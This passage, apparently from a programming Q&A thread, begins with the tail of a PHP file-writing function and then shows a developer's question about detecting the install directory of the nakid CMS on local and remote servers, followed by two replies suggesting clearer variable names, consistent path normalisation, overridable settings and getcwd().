fclose($openedfile);
if ($contentx === FALSE) {
$status=false;
}else $status=true;
return $status;
}
?>

I have been working on a content management system (nakid) and one of my toughest challenges is the file navigation. I want to make sure the file paths and settings work on local and remote servers. Right now my setup is pretty much something like this:
first.php (used by all pages):
//Set paths to nakid root
$core['dir_cur'] = dirname(__FILE__);
$core['dir_root'] = $_SERVER['DOCUMENT_ROOT'];
//Detect current nakid directory
$get_dirnakid_1 = str_replace("\\","/",dirname(__FILE__));//If on local
$get_dirnakid_2 = str_replace("/includes/php","",$get_dirnakid_1);
$get_dirnakid_3 = str_replace($_SERVER['DOCUMENT_ROOT'],"",$get_dirnakid_2);
//remove first "/"
if(substr($get_dirnakid_3, 0,1) == "/"){
$get_dirnakid_3 = substr($get_dirnakid_3, 1);
}
//Set some default vars
$core['dir_nakid_path'] = $get_dirnakid_3;
$core['dir_nakid'] = $core['dir_root']."/".$core['dir_nakid_path'];//We need to get system() for this real value - below
The reason I also did it this way is because I want the directory that this program is sitting in to be anywhere on the server ie(/nakid)(/cms)(/admin/cms)
I'm positive I am doing something the wrong way or that there is a simpler way to take care of all this.
If it helps to get a closer look at the code and how everything is being used I have it all up at nakid.org
EDIT: Just realized what I have at nakid.org is a little different than my newly posted code, but the same idea still applies to what I am attempting to do.

By and large, it looks okay to me.
You might want to give the variables more speaking names (e.g. nakid_root_dir, nakid_relative_webroot and so on.)
Remember when converting \ to / in path names: Whenever you match another directory name to one of those settings, you need to str_replace("\\","/"...) in those too.
I don't understand what you aim at with $get_dirnakid_2, though. Why will you screw up my path if I install your application in a directory that happens to be named /etc/includes/php/nakid?
Anyway, you should make those settings user overwritable as well. Sometimes, the user may want to set different settings from what you get from DOCUMENT_ROOT and consorts.

I don't fully understand what you try to get, but maybe getcwd() is what you look for:
http://www.php.net/manual/en/function.getcwd.php